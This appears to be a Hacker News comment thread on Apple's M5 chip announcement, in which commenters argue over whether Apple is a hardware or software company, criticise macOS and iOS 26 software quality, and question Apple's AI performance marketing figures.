          This is an obviously silly statement, not only is Logic Pro competitively priced ($200, relative to $100-$400 for Bitwig, $99-$750 for Live), but those applications obviously have different focuses than Logic Pro (sound design and electronic music, versus the more general-purpose and recording focus of Logic Pro, also you'd be hard pressed to find anyone who doesn't think Logic Pro comes with the best suite of stock plugins of any DAW, so the value prop angle is a particularly odd argument to make [i.e., Logic Pro is pretty obviously under priced]).

          But all this isn't that important because many of these applications are great. DAWs are one of the most competitive software categories around and there are several applications folks will vehemently defend as the best and Logic Pro is unequivocally one of them.

          > Most bedroom musicians are using Garageband or other cheap DAWs like Live Lite, and the professional studios are all bought into Pro Tools or Audition.

          This is old, but curious if you have a better source for your statement https://blog.robenkleene.com/2019/06/10/2015-digital-audio-w...

          Found a more recent survey https://www.production-expert.com/production-expert-1/2024-d...

          > We can see that Pro Tools for music is the most popular choice, with Logic for music second and Pro Tools for post coming third.

          Note that I'd say Logic Pro's popularity is actually particularly notable since it's not crossplatform, so the addressable market is far smaller than the other big players. It's phenomenal popular software, both in terms of raw popularity and fans who rave about it. E.g., note the contrast in how people talk about Pro Tools vs. Logic Pro. Logic Pro has some of the happiest users around, but Pro Tools customers talk like they feel like their hostages to the software. That difference is where the quality argument comes in.

  • alexanderson 8 hours ago

    Apple has always been a hardware company first - think of how they sell consumers computers with the OS for free, while Microsoft primarily just sells the OS (when comparing the consumer business; I don’t want to get into all the other stuff Microsoft does).

    Now that they own the SoC design pipeline, they’re really able to flex these muscles.

    • ViktorRay 7 hours ago

      Steve Jobs himself said that Apple sees itself as a software company

      https://youtu.be/dEeyaAUCyZs

      The above link is a video where he mentions that.

      It is true that Apple’s major software products like iOS and MacOS are only available on Apple’s own hardware. But the Steve Jobs justification for this (which he said in a different interview I can’t find right now so I will paraphrase) is that he felt Apple made the best hardware and software in the world so he wanted Apple’s customers to experience the best software on the best hardware possible which he felt only Apple could provide. (I wish I could find the exact quote.)

      Anyway according to Steve Jobs Apple is a software first company.

    • alt227 8 hours ago

      Apple has always been a software first company, and they only sell the hardware as a vehicle to their software. They regularly say this themselves and have always called themselves a software company. Compare their hardware revenues with that of the app store and icloud subscriptions, you will see where they make most of their money.

      EDIT: I seem to be getting downvoted, so I will just leave this here for people to see I am not lying:

      https://www.businessinsider.com/tim-cook-apple-is-not-a-hard...

      • achierius 8 hours ago

        > Compare their hardware revenues with that of the app store and icloud subscriptions, you will see where they make most of their money.

        Yes, it's $70B a year from iPhones alone and $23B from the totality of the Services org. (including all app store / subscription proceeds). Significantly more than 50% of the company's total profits come from hardware sales.

        • ertgbnm 7 hours ago

          In addition, making money off the software that others develop and sell on the app store doesn't make Apple more of a software company, it makes them a middle man.

          • alt227 7 hours ago

            IMO a middle man means you are in between 2 other services, taking a cut off the top. In this instance, apple not only created and curate the app store, but also invented the concept. In this case they are definitely not a middle man, they are a software company selling access to their software to developers.

        • alt227 7 hours ago

          Where are you getting these numbers from, care to share source?

          We should be comparing profit on those departments not revenue. Do you have those figures?

          It is well known that companies often sell the physicval devices at a loss, in order to make the real money from the services on top.

          • adastra22 6 hours ago

            Apple does not sell hardware at a loss.

            • alt227 5 hours ago

              Yeah, everyone says stuff like this but nobody can actually produce any reliable sources to show how much profit it actually makes. So until you can, its all guess work.

      • dylan604 6 hours ago

        Apple has always? Sure, maybe today with collection % of sales from apps it looks like a software company. If there was no iDevcies, there'd be no need for app store. Your link is all about Cook, yet he was not always the CEO. Woz didn't care what software you ran, he just wanted the computer to be usable so you could run whatever software. Jobs wanted to restrict things, but it was still about running the hardware. Whatever Cook thinks Apple is now does not make it always been as you claim

        • alt227 4 hours ago

          You know you might just have a point if you werent completely making that all up.

          Steve Jobs consistently made the point that Apples hardware is the same as everyone elses, what makes them different is they make the best software which enables the best user experience.

          Here see this quote from Steve Jobs which shows that his attitude is the complete opposite of what you wrote.

          https://www.youtube.com/watch?v=dEeyaAUCyZs

      • jsnell 8 hours ago

        Sure, let's compare.

        Apple's product revenue in this fiscal year has been $233B, with a gross margin of $86B.

        Their services revenue is $80B with $60B gross margin.

        • justincormack 7 hours ago

          Much of the service revenue is the payment from Google for search placement.

        • alt227 7 hours ago

          Source?

          • jsnell 3 hours ago

            Good grief. Apple's official financials.

            https://www.apple.com/newsroom/pdfs/fy2025-q3/FY25_Q3_Consol...

            Look, I totally understand making an off-hand comment like you did based on a gut feeling. Nobody can fact-check everything they write, and everyone is wrong sometimes. But it is pretty lazy to demand a source when you were just making things up. When challenged with specific and verifiable nubmers, you should have checked the single obvious source for the financials of any public company. Their quarterly statements.

      • ksec 8 hours ago

        It goes back even further, Steve Jobs said Apple is a software company, you just have to buy its hardware to use it. It is the whole experience.

      • wat10000 8 hours ago

        I did that comparison and they make the vast majority of their money on hardware. Half of their revenue is iPhone, a quarter is services, and the remaining quarter is divided up among the other hardware products.

        Regardless of revenue, Apple isn't a hardware company or a software company. It's a product company. The hardware doesn't exist merely to run the software, nor does the software exist merely to give functionality to the hardware. Both exist to create the product. Neither side is the "main" one, they're both parts of what ultimately ships.

        • alt227 4 hours ago

          > The hardware doesn't exist merely to run the software

          Watch this and maybe you might change your mind:

          https://www.youtube.com/watch?v=dEeyaAUCyZs

          • wat10000 2 hours ago

            I think he's saying software is essential, not that it's the only thing. He contrasts the iPod with products from Japanese companies, which tend to make great hardware with crap software, and that software difference is why the iPod beat them.

            Modern Apple is also quite a bit more integrated. A company designing their own highly competitive CPUs is more hardware-oriented than one that gets their CPUs off the shelf from Intel.

        • alt227 7 hours ago

          Do the same calculation for profit instead of revenue.

          • wat10000 2 hours ago

            Are those numbers available? In any case, comment said revenue, not profit.

      • HumblyTossed 8 hours ago

        Tim is the CEO, he's going to say whatever he needs to in the moment to drive investment.

        Apple is and always has been a HW company first.

        • alt227 7 hours ago

          OK So I guess when the CEO of a company explicitly says something about their company, we should just ignore it because he is 'in the moment'?

    • Hamuko 8 hours ago

      Not really. Back in the day you wouldn't buy a MacBook because it was powerful. Most likely it had a very shitty Intel CPU with not a lot of cores and with thermal challenges, and the reason you bought it was because macOS.

      • chasil 8 hours ago

        And in many decades past, OpenStep was slowly moving its GUI from Next hardware to software sales on various UNIX platforms and Windows NT.

        And this would eventually evolve into MacOS.

        https://en.wikipedia.org/wiki/OpenStep

      • hamdingers 5 hours ago

        Nope, many bought it in spite of macOS because it was a durable laptop with an excellent screen, good keyboard, and (afaik still) the only trackpad that didn't suck.

      • fnord123 8 hours ago

        The intel laptops also grounded into the user. I still can't believe they didn't have a recall to sort that out.

      • alt227 8 hours ago

        > very shitty Intel CPU with not a lot of cores and with thermal challenges

        Very often the intel chips in macbooks were stellar, they were just seriously inhibited by Apples terrible cooling designs and so were permanently throttled.

        They could never provide decent cooling for the chips coupled with their desire to make paper thin devices.

        • kllrnohj 7 hours ago

          > They could never provide decent cooling for the chips coupled with their desire to make paper thin devices.

          Curiously they managed to figure this out exactly when it became their silicon instead (M1 MacBook Pros were notably thicker and with more cooling capacity than the outgoing Intel ones)

          • alt227 7 hours ago

            I still believe they purposefully throttled the last gen of intel Macs just to make people have bad memories of them.

          • bzzzt 7 hours ago

            I presume they were just playing it safe to not let the M1 migration flop. If you're dragging your users through a big migration the last thing you need is complaints about the new hardware...

        • scrlk 7 hours ago

          They made things even worse with fan curves tuned for silence until the CPU was practically at TjMax.

      • qwertytyyuu 8 hours ago

        not just mac os, also the decent keyboard and actually good display, guarenteed.

      • leptons 4 hours ago

        >the reason you bought it was because macOS.

        That is probably the least of reasons why people buy Apple - to many it's just a status symbol, and the OS is a secondary consideration.

  • fidotron 8 hours ago

    What I would do for Snow Leopard on the M class hardware.

    • RossBencina 8 hours ago

      You could run it in an emulator.

    • asimovDev 7 hours ago

      do you mean literally 10.6 on AS or do you mean something as good as it was

      • fidotron 7 hours ago

        Something that good.

        It was coherent, (relatively) bug free, and lacked the idiot level iOSification and nagging that is creeping in all over MacOS today.

        I haven't had to restart Finder until recently, but now even that has trouble with things like network drives.

        I'm positive there are many internals today that are far better than in Snow Leopard, but it's outweighed by user visible problems.

        It shouldn't surprise you I think that Android Jelly Bean was the best phone OS ever made as well, and they went completely in the wrong direction after that.

        • astrange 6 hours ago

          It was very easy to lose data in Snow Leopard because they hadn't introduced the document autosave system yet. That was the next version.

          • fidotron 4 hours ago

            You mean it only did things you told it to do? That's a feature.

            Programs absolutely could have much more controllable auto save before for when it made sense.

            • astrange 3 hours ago

              "I lose work when the power goes out" is not a feature. Neither is "I can't apply security updates because I can't restart".

              Speaking of security it didn't have app sandboxing either.

              • fidotron 2 hours ago

                You mean programs could access the file system normally? They were absolutely isolated as standard unix processes.

                This is what I mean about iOSification - it's trending towards being a non serious OS. Linux gets more attractive by the day, and it really is the absence of proper support of hardware in the class of the M series that prevents a critical mass of devs jumping ship.

  • whitehexagon 6 hours ago

    I dunno, didnt they already crack the 400GB/s memory bandwidth some years ago? This seems like just another small bump to handle latest OS effects sludge.

    Now the M1 range, that really was an impressive 'outperform' moment of engineering for them, but otherwise this is just a clock-work MBA driven trickle of slightly better over-hyped future eWaste.

    To outperform during this crisis, hardware engineers worth their salt need to designing long lived boxes with internals that can be easily repaired or upgraded. "yeah but the RAM connections are fiddly" Great, now that sounds like a challenge worth solving.

    But you are right about the software. Installing Asahi makes me feel like I own my compter again.

    • astroflection 6 hours ago

      https://asahilinux.org/

      "Linux on Apple Silicon: Asahi Linux aims to bring you a polished Linux® experience on Apple Silicon Macs."

      Why the "®" after Linux? I think this is the first time I've seen this.

      • utf_8x 6 hours ago

        The Linux "brand" is trademarked by Linus Torvalds, presumably to stop things like "Microsoft® Linux®" from happening...

  • textlapse 3 hours ago

    It does feel like Apple is firing on all cylinders for their core competencies.

    Software (iOS26), services (Music/Tv/Cloud/Apple Intelligence) and marketing (just keep screaming Apple Intelligence for 3 months and then scream Liquid Glass) ---- on the other hand seem like they are losing steam or very reactive.

    No wonder John Ternus is the widely anticipated to replace Tim Cook (and not Craig).

  • tyrellj 6 hours ago

    This seems to be pretty true in general. SBC companies are not competing with Raspberry Pi because their software is quite a bit behind (boot loaders, linux kernel support, etc). Particle released a really cool dev board recently, but the software is lacking. Qualcomm struggled with their new CPU launch with poor support as well. It sometimes takes a while for new Intel processor features to be supported in the toolchains, kernel, and then get used in software.

    Aside from that, I think of Apple as a hardware company that must write software to sell their devices, maybe this isn't true anymore but that's how I used to view them. Maintaining and updating as much software as Apple owns is no small task either.

  • JKCalhoun 7 hours ago

    There has to be a whole different mindset with hardware though. Every change has to necessarily be more considered, cross-checked. And I don't say this in any way to disparage software engineers (hold up hand) but I suspect there's a discipline in hardware design that is ... less rigidly adhered to in software design. (And a software update containing a revert, though undesirable, is always a solution.)

  • TheAtomic 8 hours ago

    Yup. And the marketing department is ahead of both of them.

  • eloisant 8 hours ago

    Apple have always been a hardware company, like Google have always been a software company even if they're doing hardware too now.

    • steve1977 7 hours ago

      Google has always been a advertising company

      • tempest_ an hour ago

        It wasnt always but its defiantly has been the host for the DoubleClick parasite it ingested in the early 2000s

    • CharlesW 6 hours ago

      > Apple have always been a hardware company…

      Apple (post Apple II) has always been a systems company, which is much different. Dell is a hardware company.

  • thomascgalvin 8 hours ago

    > The modern Apple feels like their hardware teams way outperforming the software teams.

    There aren't a lot of tangible gains left to be made by the software teams. The OS is fine, the office suite is fine, the entertainment apps are fine.

    If "performance" is shoving AI crap into software that was already doing what I wanted it to do, I'd rather the devs take a vacation.

    • butlike 7 hours ago

      There were a few things on that page that made me excited for the future of where computing is going, but I do think we're going to hit a "lull" in terms of exciting new features until some of the really futuristic stuff comes to pass.

      Who knows, maybe the era of "exciting computing" is over, and iteration will be a more pleasant and subtle gradient curve of improvements, over the earth-shattering announcements of yore (such as the advent of popular cellular phones).

      • scbzzzzz 7 hours ago

        True. I would like to hijack this thread and wante d to discuss what we want for software that is not present. For me. All i can think of is ondevice , al/ml ( photo editing, video editing etc ) and not the ones the current companies are trying hard shove down our throats.

        May be steve is true. We don't know what we want until some one shows it .

  • kace91 8 hours ago

    There are talks of the hardware head replacing Cook.

    Hopefully that will bring whatever they’re doing right to other teams.

    • butlike 7 hours ago

      I really liked the energy of the guy who announced the iPhone Air this past WWDC or whatever it's called now. John Ternus. Hopefully he makes it there (CEO) one day; I'd like to see it.

      • thewebguyd 7 hours ago

        Ternus is who the parent was referring to, he's SVP of hardware engineering and suspected to be Cook's successor.

  • elicash 8 hours ago

    For Vision Pro, software team has been impressive. And arguably outperformed the hardware team.

    But this is the exception.

  • mproud 5 hours ago

    The hardware team has always shined, but how about one example of this:

    The PowerBook from the mid 1990’s were hugely successful, especially the first ones, which were notable for what we now take for granted: pushing the keyboard back allowing space for palm rests. Wikipedia says at one time Apple had captured 40% of the laptop market. All the while the ’90s roared on, Apple was languishing, looking for a modern OS.

  • foofoo12 8 hours ago

    It must be observed that the Apple enterprise is, above all else, a purveyor of fine physical contrivances and apparatus.

    Furthermore, they do also engage in the traffic and sale of digital programmes wrought by the hands of other, independent artisans.

  • gloosx 3 hours ago

    From my vast experience with MacOS, Apple is notoriously bad at the most basic software, like notes or calculator

  • nabla9 7 hours ago

    Doing good job is rewarded.

    Apple's Hardware Chief, John Ternus, seems to be next in line for succession to Tim Cook's position.

    • utf_8x 6 hours ago

      Interesting, I thought the next in line was Craig Federighi

  • mcv 8 hours ago

    I want this hardware available for other systems.

    • ksec 8 hours ago

      Modern ARM C1 Ultra Core is only 10% slower than M5, likely even less when you factor in system level cache and memory. So the gap isn't as wide as most people think it is.

      • mcv an hour ago

        That sounds awesome. Can we get laptops with that thing? We should be getting rid of the power hungry x86 stuff.

      • hamdingers 5 hours ago

        What laptops is that chip featured in?

  • amelius 6 hours ago

    Yes. And their consumer teams are way outperforming their business teams.

  • tantalor 8 hours ago

    Been like that since 1977

  • crazygringo 4 hours ago

    Apple is a hardware company. This has always been the case. It's not just the modern Apple.

  • 7e 7 hours ago

    Apple relies heavily on H1-B slave labor. They don’t pay their software teams enough to be competitive and they run with only about a third of the headcount they need to polish the software. Thus, they have mediocre talent and not enough of it. Penny-wise, pound foolish.

  • oofbey 5 hours ago

    In a sense, hardware's job is easier, because the goals are more clear. Make it faster, and more power efficient. Vast amounts of complexity within those goals. But try to summarize the north-star vision for a complex software project like an OS in terms anywhere close as simply as this.

  • wslh 7 hours ago

    I've been thinking whether it could be a reasonable move for Apple to launch a cheaper secondary brand, one that offers devices capable of running Linux or Windows to reach a broader market without cannibalizing its own.

    • dawnerd 7 hours ago

      Apple already sells pretty competitively priced computers. The base Mac mini for example. For most people that’s already overkill.

  • throw_this_one 8 hours ago

    Their software is literally falling apart. ios26 was the biggest trash ive ever experienced from a company this big

    • pivo 7 hours ago

      How so? Seriously asking because it works fine for me.

      • throw_this_one 6 hours ago

        Buggy. Random slowness in the UI going well below 120hz. Massive battery drain for no reason. UI elements just looking out of place, big print, random places.

        The UI itself is supposed to be intense to render to some degree. That's crazy because most of the time it looks like an Android skin from 2012.

        And on top of this all -- absolutely nobody asked for this. No one asked for some silly new UI that is transparent or whateveer.

        • lijok 5 hours ago

          Sounds like an experience problem

    • vuggamie 7 hours ago

      I'm old enough to remember Windows CE phones crashing during phone calls.

  • markus_zhang 7 hours ago

    I pretty much see the Macbook as some fancy toys with mediocre software. Maybe the kernel is solid but other software are very meh, even comparing to Windows. But I'm definitely biased as a Windows/Linux user, and my hobby is system programming so naturally a Linux box is more suitable.

    Biggest grief with MacOS software:

    - Finder is very mediocre comparing to even File explorer in Windows

    - Scrollbar and other UI issues

    Unfortunately I don't think Asahi is going to catch up, and Macbook is so expensive, so I'll probably keep buying second hand Dell/Lenovo laptop and dump a Linux on top of it.

    • Sohcahtoa82 6 hours ago

      > - Finder is very mediocre comparing to even File explorer in Windows

      It really is awful. Why the hell is there no key to delete a file? Where's the "cut" option for moving a file? Why is there no option for showing ALL folders (ie, /bin, /etc) without having to memorize some esoteric key combination?

      For fuck's sake, even my home directory is hidden by default.

      > - Scrollbar and other UI issues

      Disappearing scrollbars make sense on mobile where screen real estate is at a premium and people don't typically interact with them. It does not make sense on any screen that you'd use a mouse to navigate.

      For years, you couldn't even disable mouse acceleration without either an esoteric command line or using 3rd party software. Even now, you can't disable scroll wheel acceleration. I hate that I can't just make a consistent "one click = ~2 lines of text" behavior.

      I could go on and on about the just outright dumb decisions regarding UX in MacOS. So many things just don't make sense, and I feel like they were done for the sole purpose of being different from everyone else, rather than because of a sense of being better.

      • dd_xplore 4 hours ago

        You know IMHO Apple doesn't have any 'Pro' machines. A 'Pro' machine isn't about hardware (although it helps), it comes mainly from the software.

        MacOS doesn't have enough 'openness' to it. There's no debug information, lack of tools etc. To this day I can still daily drive a XP or 98/2000 machine( if they supported the modern web) because all the essentials are still intact. You can look around system files, you customize them edit them. I could modify game files to change their behaviour. I could modify windows registry in tons of ways to customize my experience, experiment lot of things.

        As a 'Pro' user my first expectation is options, options in everything I do , which MacOS lacks severely.

        All the random hardware that we see launching from time to time have drivers for windows but not for Mac. Even linux has tons of terminal tools and customisation.

        MacOS is like a glorified phone OS. It's weirdly locked down at certain places that drive you crazy. Tons of things do not have context menus(windows is filled with it).

        Window management sucks, there's no device manager! Not even cli tools! (Or maybe I'm not aware?) Why can't I simpy cut and paste?

        There's no API/way to control system elements via scripting, windows and linux are filled to the brim with these! Even though the UI is good looking I just cannot switch to an Apple device (both Mac and iPhone) for these reasons. I bought an iPad pro and I'm regretting. There's no termux equivalent in iPadOS/iOS , there are some terminal tools but they can't use the full processing power, they can't multi thread. They can't run in background, it's just ridiculous. The iPad Pro is just a glorious iPhone. Hardware doesn't make a device 'Pro' software does. Video editing isn't a 'Pro' workflow in the sense that it can be done in any machine that has sufficient oomph. An iPad Pro from 5 years ago will be slower than an iPad Air of today, does that make the air a 'Pro' device? No!

        • astrange 3 hours ago

          > As a 'Pro' user my first expectation is options, options in everything I do , which MacOS lacks severely.

          It's a bad idea to add an option entirely for the purpose of making the product not work anymore.

          https://limi.net/checkboxes

          > Window management sucks

          I'm always mystified reading these kinds of posts on HN because it literally always starts out as "macOS is an OS for babies" and turns out to mean "macOS doesn't have a tiling window manager". Like, cmon man, who cares.

          > there's no device manager! Not even cli tools!

          `ioreg -l` or `system_profiler`. Why does this matter?

          > There's no API/way to control system elements via scripting

          https://developer.apple.com/library/archive/documentation/Ac...

          https://developer.apple.com/documentation/XCUIAutomation

          https://en.wikipedia.org/wiki/AppleScript

          https://support.apple.com/guide/shortcuts/welcome/ios

          • Sohcahtoa82 an hour ago

            > > Window management sucks

            > I'm always mystified reading these kinds of posts on HN because it literally always starts out as "macOS is an OS for babies" and turns out to mean "macOS doesn't have a tiling window manager". Like, cmon man, who cares.

            For me, not so much the window management, but task management. I very strongly believe that the task bar (I guess the Dock bar in MacOS) should have a separate item for each open window of an app. If I have 3 Firefox windows open, that should be 3 entries in the task/dock bar so I can switch between them in a single click. I can do this in Windows, can't do it in MacOS.

            One of the problems I have with MacOS is that it's not obvious how to start a second instance of an app. Sure, some apps will have a "New Window" option. But what about apps that don't, like Burp Suite? If I bring up the launcher, then click Burp Suite when one is already loaded, it just shows me the existing one.

      • cmiller1 6 hours ago

        > Why the hell is there no key to delete a file?

        Cmd+delete? I don't really want it to be a single key as it's too easy to accidentally trigger (say I try to delete some text in a filename but accidentally bump my mouse and lose focus on the name)

      • BeFlatXIII 3 hours ago

        > Why the hell is there no key to delete a file?

        Command+Backspace.

      • kemayo 6 hours ago

        > Why the hell is there no key to delete a file?

        Command + backspace.

    • lou1306 7 hours ago

      What makes Mac great is/was the ecosystem of 3rd party tools with great UI and features. Apple used to be good enough at writing basic 1st-party apps that would mostly just disappear into the background and let you do your thing, but they are getting increasingly "louder" which... may become a problem.

      I still agree that second hand Thinkpads are ridiculously better in terms of price/quality ratio, and also more environmentally sustainable.

      • markus_zhang 7 hours ago

        I have to admit, every time I looked into screenshots of earlier Macs, like the 68K and PPC ones, I felt I loved the UI and such. I even bought a PPC laptop (I think it's a maxed out iBook with 1.5GB of RAM) to tinker with PPC assembly.

        But I could be wrong. Maybe the earlier Macs didn't have great software either -- but at least the UI is better.

        • prewett 3 hours ago

          Having lived through those days... well, it was good for the time, mostly. MacOS was definitely better than Windows 3.11, and a lot more whimsical, both the OS and Mac software in general, which I miss. The featureset, though, was limited. Managing extensions was clunky, and until MacOS 10, applications had a fixed amount of RAM they could use, which could be set by the user, but which was allocated at program start. It was also shared memory, like Windows 3.11 and to some extent Windows 95/98, so one program could, and routinely did, take down the whole OS. With Windows NT (not much adopted by consumers, to be fair), this did not happen. Windows NT and 2000 were definitely better than MacOS, arguably even UI-wise.

          I do miss window shading from MacOS 8 or 9, though. I think a whimsical skin for MacOS would be nice, too. The system error bomb icon was classic, the sad-Mac boot-failure icon was at least consolation. Now everything is cold and professional, but at least it stays out of my way and looks decent.

          • markus_zhang 2 hours ago

            Interesting. I thought the new MacOS was unix-y? But I never owned a Mac back then so not sure. For me Windows 2000 is the pinnacle. It doesn't crash (often), supports most of the games I played then, and I like the UI design.

outcoldman 7 hours ago

Marketing:

M5 announcement [1] says 4x the peak GPU compute performance for AI compared to M4. I guess in the lab?

Both iPad and MBP M5 [2][3] say "delivering up to 3.5x the AI performance". But all the examples of AI (in [3]), they are 1.2-2.3X faster than M4. So where this 3.5X is coming from? What tests did Apple do to show that?

---

1. https://www.apple.com/newsroom/2025/10/apple-unleashes-m5-th...

2. https://www.apple.com/newsroom/2025/10/apple-unveils-new-14-...

3. https://www.apple.com/newsroom/2025/10/apple-introduces-the-...

  • storus 5 hours ago

    M5 is supposed to support FP4 natively which would explain the speed up on Q4 quantized models (down from BF16).

  • relativeadv 7 hours ago

    Its not uncommon for Apple and others to compare against two generations ago rather than the immediately preceding one

    • outcoldman 5 hours ago

      I referenced everything about comparing to M4. I left outside the comparison with M1.

paxys 5 hours ago

M5 is 4-6x more powerful than M4, which was 5x more powerful than M3, which was 4x more powerful than M2, which was 4x more powerful than M1, which itself was 6x faster than an equivalent Intel processor. Great!

Looking at my Macbook though, I can say with utmost certainty that it isn't 4000x faster than the Intel one I had 5 years ago.

So, where is the disconnect here? Why is actual user experience not able to keep up with benchmarks and marketing?

  • quitit 5 hours ago

    You wrote:

    >Looking at my Macbook though, I can say with utmost certainty that it isn't 4000x faster than the Intel one I had 5 years ago. So, where is the disconnect here?

    They wrote:

    > Together, they deliver up to 15 percent faster multithreaded performance over M4

    The problem is comprehension, not marketing.

    • Choco31415 4 hours ago

      Not quite. The announcement mentions that:

      “M5 delivers over 4x the peak GPU compute performance for AI”

      In this situation, at least, it’s just referring to AI compute power.

      • mort96 an hour ago

        Their "peak GPU compute performance for AI" is quite different from your unqualified "performance". I don't know what figures they're quoting, but something stupid like supporting 4-bit floats while the predecessor only supported down to 16-bit floats could easily deliver "over 4x peak GPU compute performance for AI" (measured in FLOPS) without actually making the hardware significantly faster.

        Did they claim 4x peak GPU compute going from the M3 to M4? Or M2 to M3? Can you link to these claims? Are you sure they weren't boasting about other metrics being improved by some multiplier? Not every metric is the same, and different metrics don't necessarily stack with each other.

      • teaearlgraycold 2 hours ago

        Much of this is probably down to optimized transformer kernels.

    • CryptoBanker 5 hours ago

      I think you’re the one misreading here. The 15% refers to CPU speed while the 6x, etc. multiples refer to GPU speed

      • graeme 4 hours ago

        GPU for ai workloads. That plausibly is that much faster as the intel laptops with integrated GPUs weren't made for that workload.

  • thebitguru 5 hours ago

    Apple has also seemingly stopped caring about the quality and efficiency of their software. You can see this especially in the latest iOS/iPadOS/macOS 26 versions of their operating systems. They need their software leadership to match their hardware leadership, otherwise good hardware with bad software still leads to bad product, which is what we are seeing now.

    • heresie-dabord 5 hours ago

      > Apple has also seemingly stopped caring about the quality and efficiency of their software.

      Hardware has improved significantly, but it needs software to enable me to enjoy using it.

      Apple is not the only major company that has completely abandoned the users.

      The fastest CPUs and GPUs with the most RAM will not make me happier being targeted by commercial surveillance mechanisms, social-media applications, and hallucinating LLM systems.

    • Rover222 3 hours ago

      iOS 26 is so bad. It's the first time I've really felt annoyed daily when using an Apple device. Basically on par with my Android experiences now.

    • taf2 5 hours ago

      i think 15.6.1 (24G90) will be my last mac osx... omarchy is blazing fast

    • drcongo 5 hours ago

      I see this sentiment a lot, but I've found the OS26 releases to be considerably better than the last few years' OS releases, especially macOS which actually feels coherent now compared to the last few years of janky half baked UI.

    • cmcaleer 5 hours ago

      It is frankly ridiculous how unintuitive it was to add an email account to Mail on iOS. This is possibly the most basic functionality I would expect an email client to have. One would expect that they go to their list of mailboxes and add a new account.

      No. You exit the mail app -> Go to settings -> apps -> scroll through a massive list (that you usually just use for notification settings btw) to go to mail -> mail accounts -> add new account.

      Just a simple six-step process after you’ve already hunted for it in the mail app.

      • jrmg 5 hours ago

        There’s an “Accounts...” entry in the main “Mail” menu.

        You can also click the “+” button at the bottom of the list of accounts in the “Accounts” panel in Mail's settings window.

      • ant6n 5 hours ago

        I think the most most basic integration w.r.t. email I want from Apple is that I want to set up another email program besides “Mail” as the default email program, but without having to set up Mail first.

  • random3 5 hours ago

    The disconnect is that you're reading sideways.

    First line on their website:

    > M5 delivers over 4x the peak GPU compute performance for AI compared to M4

    It's the GPU not the CPU (which you compare with your old Intel) and it's an AI workload, not your regular workload (which again is what you compare)

    • bangaladore 5 hours ago

      And they are comparing peak compute. Which means essentially nothing.

      • random3 5 hours ago

        There was a time when Apple decided throwing random technical numbers shouldn't be the news (those were following the times of Megahertz counting). These times have been changing post Steve Jobs. This said, it is a chip announcement rather than a product announcement, so maybe that is the news.

        • edmundsauto 4 hours ago

          They also lost big during the megahertz wars. Consumers made it clear that they wanted to see number go up and voted with their wallet. There is probably still some cultural remnant of that era.

      • tempodox 5 hours ago

        Do not trust any statistics you did not fake yourself.

  • cj 5 hours ago

    I’m not sure I see the disconnect.

    At our company we used to buy everyone MacBook Pros by default.

    After the M-series chip, the MBPs are just too powerful and no longer necessary for the average white collar worker (they seem like “actual” pro machines, now) to the point where we now order MacBook Airs for new employees.

    I feel like until recently, you really needed a MBP to get a decent UX (even just using chrome). But now there doesn’t seem to be a major compromise when buying an Air for half the price, at least compared to 3-5 years ago.

    • wlesieutre 5 hours ago

      What's crazy about that to me is the Macbook Air doesn't even have a fan. The power efficiency of the ARM chips is really something.

      • mort96 an hour ago

        Well, the power efficiency about Apple Silicon combined with their firmware and drivers is really something. ARM doesn't have much to do with it.

    • charliebwrites 5 hours ago

      Anecdotal, but I switched to an M3 MBA from an M1 MBP for my iOS and other dev related work

      I’ve had zero problems with lag or compile time (prior to macOS 26 anyway)

      The only thing it can’t do is run Ableton in a low latency way without strongly changing the defaults

      You press a key on the keyboard to play a note and half a second later you hear it

      Other than that, zero regrets

      • cyberpunk 4 hours ago

        That’s weird, my m1 air handles ableton absolutely fine.

        something’s off with your setup.

    • hibikir 2 hours ago

      In 2021, we bought everyone M1 Pros with 32 gigs of ram. Historically, keeping a developer in a 4 year old laptop would have been crazy, but nobody is really calling for upgrades, like we did back when we got rid of the Intels.

    • hartator 5 hours ago

      > After the M-series chip, the MBPs are just too powerful and no longer necessary for the average white collar worker (they seem like “actual” pro machines, now) to the point where we now order regular MacBooks (not Pro’s) for new employees

      Regular MBs are not really a thing anymore. You mean Airs?

      • cj 5 hours ago

        Yes, fixed!

    • ahmeneeroe-v2 4 hours ago

      Absolutely true. I now know that I only need an MBA, not an MBP.

  • leakycap 4 hours ago

    > So, where is the disconnect here?

    > I can say with utmost certainty that it isn't 4000x faster

    The numbers you provided do not come to 4000x faster (closer to 2400x)

    > Why is actual user experience not able to keep up with benchmarks and marketing?

    Benchmarks and marketing are very different things, but you seem to be holding them up as similar here.

    The 5x 6x 4x numbers you describe across marketing across many years don't even refer to the same thing. You're giving numbers with no context, which implies you're mixing them and the marketing worked because the only thing you're recalling is the big number.

    Often, every M-series chip is a HUGE advancement over the past in GPU. Most of the "5x" performance jumps you describe are in graphics processing, and the "Intel" they're comparing it to is often an Intel iGPU like the Iris Xe or UHD series. These were low end trash iGPUs even when Apple launched those Intel devices, so being impressed by 5x performance when the M1 came out was in part because the Intel Macs had such terrible integrated graphics.

    The M1 was a giant jump in overall system responsiveness, and the M-series seems to be averaging about a 20% year over year meaningful speed increase. If you use AI/ML/GPU, the M-series yearly upgrade is even better. Otherwise, for most things it's a nice and noticeable bump but not a Intel-to-M1 jump even from M1-to-M4.

  • condiment 5 hours ago

    It's GPU performance.

    Spin up ollama and run some inference on your 5-year-old intel macbook. You won't see 4000x performance improvement (because performance is bottlenecked outside of the GPU), but you might be in the right order of magnitude.

    • blihp 5 hours ago

      Not possible given the anemic memory bandwidth [1]... you can scale up the compute all you want but if the memory doesn't scale up as well you're not going to see anywhere near those numbers.

      [1] The memory bandwidth is fine for CPU workloads, but not for GPU / NN workloads.

    • jandrese 5 hours ago

      Comparing GPU performance to some half decade old Intel IGP seems like lying with statistics.

      "Look how many times faster our car is![1]"

      [1] Compared to a paraplegic octogenarian in a broken wheelchair!"

      • umanwizard 5 hours ago

        Well, Apple isn’t making that comparison, the OP was.

  • semiinfinitely 5 hours ago

    All those extra flops are spent computing light refraction in the liquid glass of the ui

  • 0x457 5 hours ago

    Well, if you read the very next thing after 4x, you will notice it says "the peak GPU compute performance for AI compared to M4".

    The disconnect here is that you can't read. Sorry, no other way to say it.

  • tylerhou 5 hours ago

    > M5 is 4-6x more powerful than M4

    In GPU performance (probably measured on a specific set of tasks).

  • james4k 5 hours ago

    Those marketing claims are each about a very specific workload, not about general performance. Yes, it is often misleading.

  • tmountain 5 hours ago

    Probably synthetic benchmarks that don't represent actual bottlenecks in application usage. How much of what you are doing is actually CPU bound? Your machine still has to do I/O, and even though that's "very fast" these days, it's not happening inside your CPU, so you'll only see the actual improvements when running workloads that benefit from the performance improvements (i.e., complex calculations that can live in the CPU and its cache).

